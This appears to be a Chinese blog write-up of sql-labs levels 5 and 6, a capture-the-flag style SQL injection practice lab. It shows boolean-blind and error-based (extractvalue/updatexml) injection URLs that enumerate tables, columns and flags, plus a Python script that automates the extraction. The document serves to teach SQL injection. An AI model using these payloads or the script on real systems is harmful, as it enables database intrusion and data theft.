0ne2W
0ne2W

sql-labs 5-6通关笔记

title: 2022-07-08sql-labs通关笔记

grammar_cjkRuby: true

sql-5

方法一布尔盲注

尝试判断注入类型

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1’ and 1=1 --+ 判断出字符型注入

查询当前数据库下的数据表

判断数据表名的长度

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(length((select table_name from information_schema.tables where table_schema=database() limit {},1))>{},1,0) --+

其中第一个大括号为判断的第几个表,第二个大括号为表名的长度
爆破表名

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={},1,0) --+

第一个大括号为猜测的第几个数据表从0开始,第二个大括号为数据表名字的第几位,第三个大括号为第猜测的字符
爆破出:emails,p5jeT0XK(id,flag),在p5jeT0XK中存在flag字段

猜测字段名

判断字段长度

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(length((select flag from p5jeT0XK limit 3,1))>40,1,0) --+

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(ascii(mid((select column_name from information_schema.columns where table_name=p5jeT0XK limit {},1),{},1))={},1,0) --+

其中第一个大括号为第几个字段,第二个大括号为字段的第几个字母,第三个为猜测的字符
爆破出:emails,p5jeT0XK(id,flag),在p5jeT0XK中存在flag字段

查询flag

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(ascii(mid((select flag from p5jeT0XK limit 3,1),{},1))={},1,0) --+

最终查询到的flag为PTB{90f03b1e-b289-4072-b3a1-87b0b6b82986}

方法二报错注入

报错注入的方式有多种,此处演示一种
xpath语法错误
利用xpath语法错误来进行报错注入主要利用extractvalue和updatexml两个函数。

extractvalue函数
函数原型:extractvalue(xml_document,Xpath_string)
正常语法:extractvalue(xml_document,Xpath_string);
第一个参数:xml_document是string格式,为xml文档对象的名称
第二个参数:Xpath_string是xpath格式的字符串
作用:从目标xml中返回包含所查询值的字符串
第二个参数是要求符合xpath语法的字符串,如果不满足要求,则会报错,并且将查询结果放在报错信息里,因此可以利用

updatexml(xml_doument,XPath_string,new_value)
第一个参数:XML的内容
第二个参数:是需要update的位置XPATH路径
第三个参数:是更新后的内容
所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式
函数利用和语法明白了,下面注入的payload就清楚明白
extractvalue和updatexml函数一次只能输出32个字节,使用substring函数进行分段
substring(1,2),第一个参数是截取的内容,第二个参数是截取的位数

爆出数据库名

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and (select extractvalue(1,concat('~',(select database()))))--+

爆出当前数据库下的表

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and (select extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))))--+

结果为~emails,p5jeT0XK,referers,uagent

爆出p5jeT0XK表下的字段

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and (select extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='p5jeT0XK')))) --+

结果为~id,flag

查看p5jeT0XK表下的flag

此时需要注意到一个问题,extractvalue()能查询字符串的最大长度为32,如果我们想要的结果超过32,就要用substring()函数截取或limit分页,一次查看最多32位 #F44336

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and (select extractvalue (1,concat('~',substring((select flag from p5jeT0XK limit 3,1),20)))) --+

通过改变位数获得完整的flagPTB{90f03b1e-b289-4072-b3a1-87b0b6b82986}

sql-6

尝试注入类型

https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/
?id=1 and 1=2 判断否是数字注入,回显正常,排除
https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/
?id=1’ 判断是否是字符注入,回显无错误
https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/
?id=1" and 1=2 判断是否是特殊符号,尝试括号和双引号在单个双引号的时候返回错误,可以判断出为双引号包括id

猜测查询语句如下
select * from database() ‘“.id.”’ limit 0,1;

测试数据库名

使用的方法是布尔盲注,也可以采用其他方法进行注入
使用mid截取第指定位的字符

https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/
?id=1" and 1=if(mid(database(),1,1)='s',1,0) --+

判断第一位是否为s,当为s的时候可以猜测出,数据库名为security,无需进行向下爆破

判断数据库下的表

判断数据表名的长度

https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/?id=1" and 1=if(length((select table_name from information_schema.tables where table_schema='security' limit {},1))>{},1,0)--+

其中第一个大括号为判断的第几个数据表名,第二个为判读的长度

https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/?id=1\" and 1=if(ascii(mid((select table_name from information_schema.tables where table_schema='security' limit {},1),{},1))='{}',1,0) --+

第一个大括号为猜测的第几个数据表从0开始,第二个大括号为数据表名字的第几位,第三个大括号为第猜测的字符
爆出来的第一个数据表为emil第二个数据库名为YS8SI4vt猜测flag在该数据表内,进一步查询数据表的字段名

查询数据表字段名

https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/?id=1\" and 1=if(ascii(mid((select column_name from information_schema.columns where table_name='referers' limit {},1),{},1))={},1,0) --+

其中第一个大括号为第几个字段,第二个大括号为字段的第几个字母,第三个为猜测的字符,爆破字段名有一为flag,进而查询字段内容

查询flag

https://1405-f2a10766-01f3-406d-b8e3-07550c6bfdfe.do-not-trust.hacking.run/?id=1" and (select updatexml(1,concat('~',substring((select flag from YS8SI4vt limit 3,1),20)),1))--+

用了报错注入,因为布尔盲注太浪费时间了,不得不说,还是报错注入比较简单
为了方便注入编写的python脚本

import requests
from lxml import etree
#布尔盲注
def bind_1():
    table_name=[]
    for m in range(40,43):
        for i in range(48,126):
            url = "https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(ascii(mid((select flag from p5jeT0XK limit 3,1),{},1))={},1,0) --+".format(m,i)
            res=requests.get(url)
            # print(res.text)
            print("正在测试第{}个第{}条".format(m,i))
            if "You are in..........." in res.text:
               table_name.append(chr(i))
               print("".join(table_name))
               break
    print("".join(table_name))
#报错注入
def bind_2():
    for i in range(5):
        url="https://1405-f2a10766-01f3-406d-b8e3-07550c6bfdfe.do-not-trust.hacking.run/?id=1\" and (select updatexml(1,concat('~',(select flag from YS8SI4vt limit {},1)),1))--+".format(i)
        res=requests.get(url).text
        html=etree.HTML(res)
        content=html.xpath("/html/body/div[1]/font[2]/font[1]/text()")
        print(content)
if __name__ == '__main__':
    bind_2()

参考https://blog.csdn.net/silence1_/article/details/90812612
https://blog.csdn.net/m0_60988110/article/details/123544853

你可能感兴趣的:(sql-注入学习笔记,sql,数据库,网络安全)

  • Python ORM svygh123 python编程python开发语言
    Python中的ORM(Object-RelationalMapping)框架,其中最著名和广泛使用的两个是SQLAlchemy和DjangoORM。1.SQLAlchemySQLAlchemy是Python中功能最强大的SQL工具库之一,它不仅提供了ORM功能,还提供了核心的数据库SQL工具。它允许你用Python类来表示数据库表,并且可以使用Python代码而不是直接写SQL查询语句来操作数据
  • python orm框架有哪些 hakesashou python基础知识python数据库sqlite
    ORM概念ORM(ObjectRalationalMapping,对象关系映射)用来把对象模型表示的对象映射到基于SQL的关系模型数据库结构中去。这样,我们在具体的操作实体对象的时候,就不需要再去和复杂的SQL语句打交道,只需简单的操作实体对象的属性和方法。ORM技术是在对象和关系之间提供了一条桥梁,前台的对象型数据和数据库中的关系型的数据通过这个桥梁来相互转化。Python中常用的ORMSQLO
  • [SAP ABAP] 性能优化 山茶花开时。 SAP#SAPABAPSAPABAP开发语言
    1.数据库编程OPENSQL方面优化1.避免使用SELECT*,只查询需要的字段即可尽量使用SELECTf1f2...(具体字段)来代替SELECT*写法2.如果确定只查询一条数据时,使用SELECTSINGLE...或者是SELECT...UPTO1ROWS...使用语法UPTOnROWS来实现对数据前n项的查询3.统计时,直接使用SQL聚合函数,而不是将数据读取出来后在程序里再进行统计充分利用
  • Python 魔法学院 - 第32篇:Python ORM框架 ⭐⭐⭐ 星核日记 《Python魔法学院》python数据库pycharm开发语言windows
    目录引言1.ORM框架概述1.1什么是ORM?比喻:ORM就像一位翻译官1.2ORM的优势2.[SQLAlchemy](https://docs.sqlalchemy.org.cn/en/20/intro.html)2.1SQLAlchemy简介2.2SQLAlchemy的核心组件2.3SQLAlchemy示例2.3.1安装SQLAlchemy2.3.2定义模型2.3.3插入数据2.3.4查询数据
  • CTF-SQL注入总结 SVicen CTFsqlweb安全安全
    1、当URL地址传入的参数进行MD5加密时,可采用数组进行绕过。MD5对数组参数不会加密。$a=$GET['a'];$b=$_GET['b'];if($a!=$b&&md5($a)==md5($b)){echo$flag;}方法一:利用md5()函数的漏洞绕过即使用数组绕过的方法:由于md5对于字符串检验的时候,遇到数组会返回NULL所以两个数组经过加密后得到的都是NULL,也就是相等的。所以上传
  • 一文讲解Spring中应用的设计模式 Journey_CR Springspring设计模式java
    我们都知道Spring框架中用了蛮多设计模式的:工厂模式呢,就是用来创建对象的,把对象的创建和使用分开,这样代码更灵活。代理模式呢,是用一个代理对象来控制对真实对象的访问,可以在访问前后做一些处理。单例模式呢,保证一个类只有一个实例,比如数据库连接池就经常用单例模式。模板模式呢,定义一个算法的框架,把具体的实现延迟到子类去做。观察者模式呢,定义了对象之间的一对多依赖关系,当一个对象状态改变时,依赖
  • mysql死锁排查_mysql 死锁问题排查 字节全栈_BjO mysqlandroid数据库
    应用访问Mysql数据库的时候,如果业务逻辑写的不严谨,不规范,就会发生死锁,如果此业务逻辑调用并发高,则业务日志经常会有死锁的错误日志产生。应用发生死锁,于是dba就去排查,看数据库的错误日志,就会发现,没有任何关于死锁的日志告警,这是因为默认配置情况下,数据库是不打印任何死锁的日志信息。那如何去排查应用的死锁问题呢,下面给大家详细介绍。先看看关于死锁信息打印的参数,默认是关闭mysql>sho
  • 深度学习目标检测中的_单目测距原理与实现 关键点及改进建议 QQ_767172261 单目测距深度学习目标检测人工智能
    深度学习目标检测中的_单目测距原理与实现关键点及改进建议文章目录单目测距的进一步解释1.焦距的确定2.物体宽度\(W\)的获取3.图像处理技巧4.提高性能的建议5.实现代码中的注释添加一、前言单目视觉测距:网上有很多关于单目测距的文章,主要借鉴的是OpenCV学习笔记(二十一)——简单的单目视觉测距尝试和单目摄像机测距(python+opencv)两篇文章,在这里特别作出说明。工作环境:Ubunt
  • gitlab安装及邮箱配置和常用使用 Gen邓艮艮 gitlablinux环境软件gitlab
    1.安装GitLab注意关闭网络防火墙和网络安全组#1.下载镜像wgethttps://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7/gitlab-ce-14.10.5-ce.0.el7.x86_64.rpm#2.安装依赖yuminstall-ypolicycoreutilsopenssh-serveropenssh-clientspostfixpo
  • 2025毕设springboot 老年活动中心管理系统论文+源码 zhihao508 课程设计springboot后端
    本系统(程序+源码)带文档lw万字以上文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容选题背景关于老年活动中心管理系统的研究,现有研究主要集中在社区养老服务、活动中心运营管理以及信息管理系统设计等领域。然而,专门针对老年活动中心管理系统的全面设计与实现的研究相对较少,尤其是在整合用户管理、活动管理、资源管理和维修管理等多个关键环节的系统化解决方案上。随着人口老龄化的加剧
  • ROS1学习笔记--通信编程 喵喵三三 ROS学习笔记
    前面有一个博客笔者概述了关于ROS1的通信机制,现在就来通过几个例子来讲讲具体的通信编程一、话题编程话题编程流程:创建发布者创建订阅者添加编译选项运行可执行程序1.创建一个发布者ROS节点初始化编写相关的节点信息,包括发布的话题名和消息类型按一定的频率循环发布消息#include#include"ros/ros.h"#include"std_msgs/String.h"intmain(intarg
  • MySQL存储结构的使用 weixin_30814223 数据库
    前言今天公司老大让我做一个MySQL的调研工作,是关于MySQL的存储结构的使用。这里我会通过3个例子来介绍一下MySQL中存储结构的使用过程,以及一些需要注意的点。笔者环境系统:Windows7MySQL:MySQL5.0.96准备工作1.新建两张数据表:student1,student2新建student1DROPTABLEIFEXISTSstudent1;CREATETABLEstudent
  • ROS学习笔记-roslaunch文件的编写&用sh脚本控制launch文件启动顺序 诗筱涵 ROS无人机-a-个人笔记
    转载自:https://mp.weixin.qq.com/s?__biz=MzUyMTkxODQyOQ==&mid=2247484719&idx=1&sn=27b3a01c295ae256dc69d805fd5904ba&chksm=f9d2879dcea50e8b71b78d8b69750d282055173ea65494342e983088276859b7c4fe227f21f1&scene=
  • MySQL底层概述—5.InnoDB参数优化 心上之秋 mysql数据库
    大纲1.内存相关参数优化(1)缓冲池内存大小配置(2)配置多个BufferPool实例(3)Chunk(块)大小配置(4)InnoDB缓存性能评估(5)Page管理相关参数(6)ChangeBuffer相关参数优化2.日志相关参数优化(1)日志缓冲区相关参数配置(2)日志文件参数优化3.IO线程相关参数优化(1)查询缓存相关的参数(2)脏页刷盘相关的参数(3)LRU链表相关的参数(4)脏页刷盘相关
  • MySQL与Python交互-08 ningmengjing_ Mysql数据库mysqlpython数据库
    一、数据准备1.创建数据表--创建"京东"数据库createdatabasejing_dongcharset=utf8;--使用"京东"数据库usejing_dong;--创建一个商品goods数据表createtablegoods(idintunsignedprimarykeyauto_incrementnotnull,namevarchar(150)notnull,cate_namevarch
  • MySQL数据库的存储结构 dianmei3204 数据库
    --把若干条sql语句封装起来,起个名字,叫做过程,也是没有返回值的函数--把这个过程存储在数据库中->存储过程--存储过程的创建过程createprocedureproceduceName()beginsql语句end$--查看showprocedurestatus\G--调用callprocedureName()$--声明变量declareageintdefault18;--运算setage:
  • 36.FFmpeg学习笔记 - ffplay源码解读4之解码线程 whoyouare888 FFmpeg
    本篇说一下解码线程。在stream_component_open函数中,分别创建了一个视频解码线程和音频解码线程:staticintstream_component_open(VideoState*is,intstream_index){...switch(avctx->codec_type){caseAVMEDIA_TYPE_AUDIO:...if((ret=decoder_start(&is-
  • 流数据库中的RisingWave和Materialize weixin_30777913 数据库
    流数据库(StreamingDatabase)是一种专门设计用于处理大量实时流数据的数据库,它能够在数据生成时立即进行处理,从而实现实时洞察和分析。RisingWave和Materialize都是这一领域的代表性技术。RisingWave和Materialize都是强大的流数据库技术,它们各自具有独特的技术特点和应用场景。通过利用这些技术,企业可以构建实时、高效、可扩展的数据处理系统,以满足不断变
  • Linux安装Python3 培根芝士 PythonLinuxpythonlinux
    1.下载python3编译的依赖包yuminstall-ygccpatchlibffi-develpython-develzlib-develbzip2-developenssl-develncurses-develsqlite-develreadline-develtk-develgdbm-develdb4-devellibpcap-develxz-devel2.安装openssl1.1.xyu
  • Linux下安装python3.10.12环境 爱思考的李MAX linux运维服务器python
    安装python3编程环境检查是否安装python3python3-V安装python3依赖sudoyum-yinstallzlib-develbzip2-developenssl-develncurses-develsqlite-develreadline-develtk-develgdbm-develdb4-devellibpcap-develxz-devellibffi-devel下载pyt
  • C#面:ASP.NET Core Filter如何支持依赖注入? 那个那个鱼 c#ASP.NETC#面试题c#asp.net开发语言.net
    ASP.NETCoreFilter可以通过依赖注入来支持。在ASP.NETCore中,依赖注入是一种将依赖对象提供给类的机制,它可以帮助我们解耦和测试代码。要在ASP.NETCoreFilter中使用依赖注入,可以按照以下步骤进行操作:首先,需要在Startup类的ConfigureServices方法中注册依赖项。可以使用内置的依赖注入容器(IServiceCollection)来注册依赖项。例
  • 第28节课:前端项目实战—从需求分析到开发流程的全方位指南 学问小小谢 HTML学习笔记前端需求分析安全web安全网络性能优化html5
    目录项目需求分析与设计项目背景与目标项目背景项目目标需求收集与分析用户需求业务需求项目设计技术栈选择系统架构设计数据库设计项目开发流程环境搭建安装Node.js和npm初始化项目编码实践组件化开发状态管理测试与调试单元测试集成测试部署与维护部署维护结语在前端开发领域,将理论知识应用于实际项目是提升技能的关键。本节课将通过一个完整的前端项目实战案例,详细介绍项目需求分析与设计,以及项目开发流程,帮助
  • JavaWeb实验 JavaBean与Servlet 巫师不要去魔法部乱说 servlet
    实验目的掌握编写JavaBean的规范,学会如何在JSP中使用JavaBean;掌握JSP、JavaBean和Servlet综合应用的基本原则。实验内容创建一个WEB应用,综合利用JSP、JavaBean和Servlet技术实现用户登录(注册功能选做)。程序至少包含:一个登录页面login.jsp,一个欢迎页面hello.jsp,一个servlet和一个bean。参考实验7,运用实验中创建数据库和
  • 实验八 JSP访问数据库 无尽罚坐的人生 #JavaWebjava数据库android
    实验八JSP访问数据库目的:1、熟悉JDBC的数据库访问模式。2、掌握使用MySQL数据库的使用实验要求:1、通过JDBC访问mysql数据,实现增删改查功能的实现2、要求提交实验报告,将代码和实验结果页面截图放入报告中实验过程:一、安装Mysql,设置好数据库的账户和密码不需要创建一个账户,选择skipsing-up即可。对数据库服务器在访问有端口,账户名称和密码进行设置。手工选择中文字符集23
  • 全面MFC程序开发手册 北海有座岛
    本文还有配套的精品资源,点击获取简介:MFC是微软为Windows应用程序开发提供的C++库,通过面向对象的封装简化了API的使用,便于构建用户界面、数据库和网络通信软件。本参考大全深入解析了MFC的框架结构、核心概念以及关键组成部分,包括文档/视图架构、消息映射、控件与对话框、数据库支持、网络编程、异常处理、国际化和本地化、打印功能、以及DLL支持。这些知识点的熟练掌握对于高效开发高质量Wind
  • mysql通过cmd命令行操作数据库 字节全栈_bgK 数据库mysqladb
    退出MYSQL命令:exit(回车)四、修改用户名密码=========格式:mysqladmin-u用户名-p旧密码password新密码示例:给root用户设置密码为123456mysqladmin-uroot-password123456再将root用户密码修改为123123mysqladmin-uroot-p123456password123123命令行修改root密码:mysql>UPD
  • .NET Core属性依赖注入的3大秘密,你猜对了几个? 墨瑾轩 C#乐园.netcore
    关注墨瑾轩,带你探索编程的奥秘!超萌技术攻略,轻松晋级编程高手技术宝库已备好,就等你来挖掘订阅墨瑾轩,智趣学习不孤单即刻启航,编程之旅更有趣嘿,小伙伴们!今天我们要深入探讨的是.NETCore中的一个神秘武器——属性依赖注入(PropertyDependencyInjection,DI)。你知道吗?虽然它不像构造函数注入那样被广泛推崇,但在某些特定场景下,属性注入却能发挥意想不到的作用。那么问题来
  • 分词实现小案例 CodingBrother 性能优化架构架构中文分词
    MySQL并不是一个专门设计用于处理自然语言处理(NLP)或文本分词的数据库,但可以通过一些方法和技巧实现基本的分词功能,尤其是在处理中文文本或其他语言的应用场景中。以下是一些在MySQL中实现分词的常用方案和设计策略。1.使用FULLTEXT索引MySQL提供了FULLTEXT索引,允许在文本字段上进行全文搜索。此功能可以在英文等语言中有效支持分词。创建FULLTEXT索引CREATETABLE
  • spring mysql jdbc insert 占位符_深入浅出JDBC(三) - Spring JdbcTemplate weixin_39943000 springmysqljdbcinsert占位符
    上一次我们讨论了Dbutils的用法,其实现原理很简单,就是对JDBC的原始操作进行封装。但是无论什么操作,首先得创建Connection或者DataSource对象。在业务项目的开发中,手动地创建和销毁Connection比较繁琐,且不能充分地利用资源。于是有了连接池DBCP和C3P0两个框架的出现,但是业务开发过程中,对连接资源的获取和释放同业务是完全无关的,那能不能就不关心连接的获取和释放,
  • 使用mongodb进行文章的存储 薛定谔的猫1982 mongodb数据库mongodb
    简单文档存储存储思路:把文章或页面信息拆分成标题、正文、作者等字段,组成一个文档,每个文档对应一篇文章或一个页面。示例文档{"title":"技术新趋势","author":"李华","content":"近期技术领域呈现出诸多新趋势……","publish_date":"2025-02-03"}操作步骤:使用MongoDB客户端(如MongoShell),连接数据库后选择集合,用insertOn
  • redis学习笔记——不仅仅是存取数据 Everyday都不同 returnSourceexpire/delincr/lpush数据库分区redis
    最近项目中用到比较多redis,感觉之前对它一直局限于get/set数据的层面。其实作为一个强大的NoSql数据库产品,如果好好利用它,会带来很多意想不到的效果。(因为我搞java,所以就从jedis的角度来补充一点东西吧。PS:不一定全,只是个人理解,不喜勿喷)   1、关于JedisPool.returnSource(Jedis jeids)   这个方法是从red
  • SQL性能优化-持续更新中。。。。。。 atongyeye oraclesql
    1 通过ROWID访问表--索引 你可以采用基于ROWID的访问方式情况,提高访问表的效率, , ROWID包含了表中记录的物理位置信息..ORACLE采用索引(INDEX)实现了数据和存放数据的物理位置(ROWID)之间的联系. 通常索引提供了快速访问ROWID的方法,因此那些基于索引列的查询就可以得到性能上的提高. 2 共享SQL语句--相同的sql放入缓存 3 选择最有效率的表
  • [JAVA语言]JAVA虚拟机对底层硬件的操控还不完善 comsci JAVA虚拟机
         如果我们用汇编语言编写一个直接读写CPU寄存器的代码段,然后利用这个代码段去控制被操作系统屏蔽的硬件资源,这对于JVM虚拟机显然是不合法的,对操作系统来讲,这样也是不合法的,但是如果是一个工程项目的确需要这样做,合同已经签了,我们又不能够这样做,怎么办呢? 那么一个精通汇编语言的那种X客,是否在这个时候就会发生某种至关重要的作用呢? &n
  • lvs- real 男人50 LVS
    #!/bin/bash # # Script to start LVS DR real server. # description: LVS DR real server # #.  /etc/rc.d/init.d/functions VIP=10.10.6.252 host='/bin/hostname' case "$1" in sta
  • 生成公钥和私钥 oloz DSA安全加密
    package com.msserver.core.util; import java.security.KeyPair; import java.security.PrivateKey; import java.security.PublicKey; import java.security.SecureRandom; public class SecurityUtil {
  • UIView 中加入的cocos2d,背景透明 374016526 cocos2dglClearColor
    要点是首先pixelFormat:kEAGLColorFormatRGBA8,必须有alpha层才能透明。然后view设置为透明glView.opaque = NO;[director setOpenGLView:glView];[self.viewController.view setBackgroundColor:[UIColor clearColor]];[self.viewControll
  • mysql常用命令 香水浓 mysql
    连接数据库 mysql -u troy -ptroy 备份表 mysqldump -u troy -ptroy mm_database mm_user_tbl > user.sql 恢复表(与恢复数据库命令相同) mysql -u troy -ptroy mm_database < user.sql 备份数据库 mysqldump -u troy -ptroy
  • 我的架构经验系列文章 - 后端架构 - 系统层面 agevs JavaScriptjquerycsshtml5
    系统层面: 高可用性 所谓高可用性也就是通过避免单独故障加上快速故障转移实现一旦某台物理服务器出现故障能实现故障快速恢复。一般来说,可以采用两种方式,如果可以做业务可以做负载均衡则通过负载均衡实现集群,然后针对每一台服务器进行监控,一旦发生故障则从集群中移除;如果业务只能有单点入口那么可以通过实现Standby机加上虚拟IP机制,实现Active机在出现故障之后虚拟IP转移到Standby的快速
  • 利用ant进行远程tomcat部署 aijuans tomcat
    在javaEE项目中,需要将工程部署到远程服务器上,如果部署的频率比较高,手动部署的方式就比较麻烦,可以利用Ant工具实现快捷的部署。这篇博文详细介绍了ant配置的步骤(http://www.cnblogs.com/GloriousOnion/archive/2012/12/18/2822817.html),但是在tomcat7以上不适用,需要修改配置,具体如下: 1.配置tomcat的用户角色
  • 获取复利总收入 baalwolf 获取
           public static void main(String args[]){         int money=200;         int year=1;         double rate=0.1; &
  • eclipse.ini解释 BigBird2012 eclipse
    大多数java开发者使用的都是eclipse,今天感兴趣去eclipse官网搜了一下eclipse.ini的配置,供大家参考,我会把关键的部分给大家用中文解释一下。还是推荐有问题不会直接搜谷歌,看官方文档,这样我们会知道问题的真面目是什么,对问题也有一个全面清晰的认识。 Overview 1、Eclipse.ini的作用 Eclipse startup is controlled by th
  • AngularJS实现分页功能 bijian1013 JavaScriptAngularJS分页
            对于大多数web应用来说显示项目列表是一种很常见的任务。通常情况下,我们的数据会比较多,无法很好地显示在单个页面中。在这种情况下,我们需要把数据以页的方式来展示,同时带有转到上一页和下一页的功能。既然在整个应用中这是一种很常见的需求,那么把这一功能抽象成一个通用的、可复用的分页(Paginator)服务是很有意义的。   &nbs
  • [Maven学习笔记三]Maven archetype bit1129 ArcheType
    archetype的英文意思是原型,Maven archetype表示创建Maven模块的模版,比如创建web项目,创建Spring项目等等.   mvn archetype提供了一种命令行交互式创建Maven项目或者模块的方式,   mvn archetype   1.在LearnMaven-ch03目录下,执行命令mvn archetype:gener
  • 【Java命令三】jps bit1129 Java命令
    jps很简单,用于显示当前运行的Java进程,也可以连接到远程服务器去查看   [hadoop@hadoop bin]$ jps -help usage: jps [-help] jps [-q] [-mlvV] [<hostid>] Definitions: <hostid>: <hostname>[:
  • ZABBIX2.2 2.4 等各版本之间的兼容性 ronin47
    zabbix更新很快,从2009年到现在已经更新多个版本,为了使用更多zabbix的新特性,随之而来的便是升级版本,zabbix版本兼容性是必须优先考虑的一点 客户端AGENT兼容 zabbix1.x到zabbix2.x的所有agent都兼容zabbix server2.4:如果你升级zabbix server,客户端是可以不做任何改变,除非你想使用agent的一些新特性。 Zabbix代理(p
  • unity 3d还是cocos2dx哪个适合游戏? brotherlamp unity自学unity教程unity视频unity资料unity
    unity 3d还是cocos2dx哪个适合游戏? 问:unity 3d还是cocos2dx哪个适合游戏? 答:首先目前来看unity视频教程因为是3d引擎,目前对2d支持并不完善,unity 3d 目前做2d普遍两种思路,一种是正交相机,3d画面2d视角,另一种是通过一些插件,动态创建mesh来绘制图形单元目前用的较多的是2d toolkit,ex2d,smooth moves,sm2,
  • 百度笔试题:一个已经排序好的很大的数组,现在给它划分成m段,每段长度不定,段长最长为k,然后段内打乱顺序,请设计一个算法对其进行重新排序 bylijinnan java算法面试百度招聘
    import java.util.Arrays; /** * 最早是在陈利人老师的微博看到这道题: * #面试题#An array with n elements which is K most sorted,就是每个element的初始位置和它最终的排序后的位置的距离不超过常数K * 设计一个排序算法。It should be faster than O(n*lgn)。
  • 获取checkbox复选框的值 chiangfai checkbox
    <title>CheckBox</title> <script type = "text/javascript"> doGetVal: function doGetVal() { //var fruitName = document.getElementById("apple").value;//根据
  • MySQLdb用户指南 chenchao051 mysqldb
    原网页被墙,放这里备用。 MySQLdb User's Guide Contents Introduction Installation _mysql MySQL C API translation MySQL C API function mapping Some _mysql examples MySQLdb
  • HIVE 窗口及分析函数 daizj hive窗口函数分析函数
    窗口函数应用场景: (1)用于分区排序 (2)动态Group By (3)Top N (4)累计计算 (5)层次查询 一、分析函数 用于等级、百分点、n分片等。 函数             说明 RANK()     &nbs
  • PHP ZipArchive 实现压缩解压Zip文件 dcj3sjt126com PHPzip
    PHP ZipArchive 是PHP自带的扩展类,可以轻松实现ZIP文件的压缩和解压,使用前首先要确保PHP ZIP 扩展已经开启,具体开启方法就不说了,不同的平台开启PHP扩增的方法网上都有,如有疑问欢迎交流。这里整理一下常用的示例供参考。 一、解压缩zip文件 01 02 03 04 05 06 07 08 09 10 11
  • 精彩英语贺词 dcj3sjt126com 英语
    I'm always here              我会一直在这里支持你                &nb
  • 基于Java注解的Spring的IoC功能 e200702084 javaspringbeanIOCOffice
                                      
  • java模拟post请求 geeksun java
    一般API接收客户端(比如网页、APP或其他应用服务)的请求,但在测试时需要模拟来自外界的请求,经探索,使用HttpComponentshttpClient可模拟Post提交请求。 此处用HttpComponents的httpclient来完成使命。 import org.apache.http.HttpEntity ; import org.apache.http.HttpRespon
  • Swift语法之 ---- ?和!区别 hongtoushizi ?swift!
    转载自: http://blog.sina.com.cn/s/blog_71715bf80102ux3v.html   Swift语言使用var定义变量,但和别的语言不同,Swift里不会自动给变量赋初始值,也就是说变量不会有默认值,所以要求使用变量之前必须要对其初始化。如果在使用变量之前不进行初始化就会报错: var stringValue : String //
  • centos7安装jdk1.7 jisonami jdkcentos
    安装JDK1.7 步骤1、解压tar包在当前目录 [root@localhost usr]#tar -xzvf jdk-7u75-linux-x64.tar.gz 步骤2:配置环境变量 在etc/profile文件下添加 export JAVA_HOME=/usr/java/jdk1.7.0_75 export CLASSPATH=/usr/java/jdk1.7.0_75/lib
  • 数据源架构模式之数据映射器 home198979 PHP架构数据映射器datamapper
    前面分别介绍了数据源架构模式之表数据入口、数据源架构模式之行和数据入口数据源架构模式之活动记录,相较于这三种数据源架构模式,数据映射器显得更加“高大上”。   一、概念 数据映射器(Data Mapper):在保持对象和数据库(以及映射器本身)彼此独立的情况下,在二者之间移动数据的一个映射器层。概念永远都是抽象的,简单的说,数据映射器就是一个负责将数据映射到对象的类数据。 &nb
  • 在Python中使用MYSQL pda158 mysqlpython
    缘由   近期在折腾一个小东西须要抓取网上的页面。然后进行解析。将结果放到 数据库中。   了解到 Python在这方面有优势,便选用之。   由于我有台 server上面安装有 mysql,自然使用之。在进行数据库的这个操作过程中遇到了不少问题,这里 记录一下,大家共勉。    python中mysql的调用    百度之后能够通过MySQLdb进行数据库操作。
  • 单例模式 hxl1988_0311 java单例设计模式单件
    package com.sosop.designpattern.singleton; /* * 单件模式:保证一个类必须只有一个实例,并提供全局的访问点 * * 所以单例模式必须有私有的构造器,没有私有构造器根本不用谈单件 * * 必须考虑到并发情况下创建了多个实例对象 * */ /** * 虽然有锁,但是只在第一次创建对象的时候加锁,并发时不会存在效率
  • 27种迹象显示你应该辞掉程序员的工作 vipshichg 工作
    1、你仍然在等待老板在2010年答应的要提拔你的暗示。 2、你的上级近10年没有开发过任何代码。 3、老板假装懂你说的这些技术,但实际上他完全不知道你在说什么。 4、你干完的项目6个月后才部署到现场服务器上。 5、时不时的,老板在检查你刚刚完成的工作时,要求按新想法重新开发。 6、而最终这个软件只有12个用户。 7、时间全浪费在办公室政治中,而不是用在开发好的软件上。 8、部署前5分钟才开始测试。
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他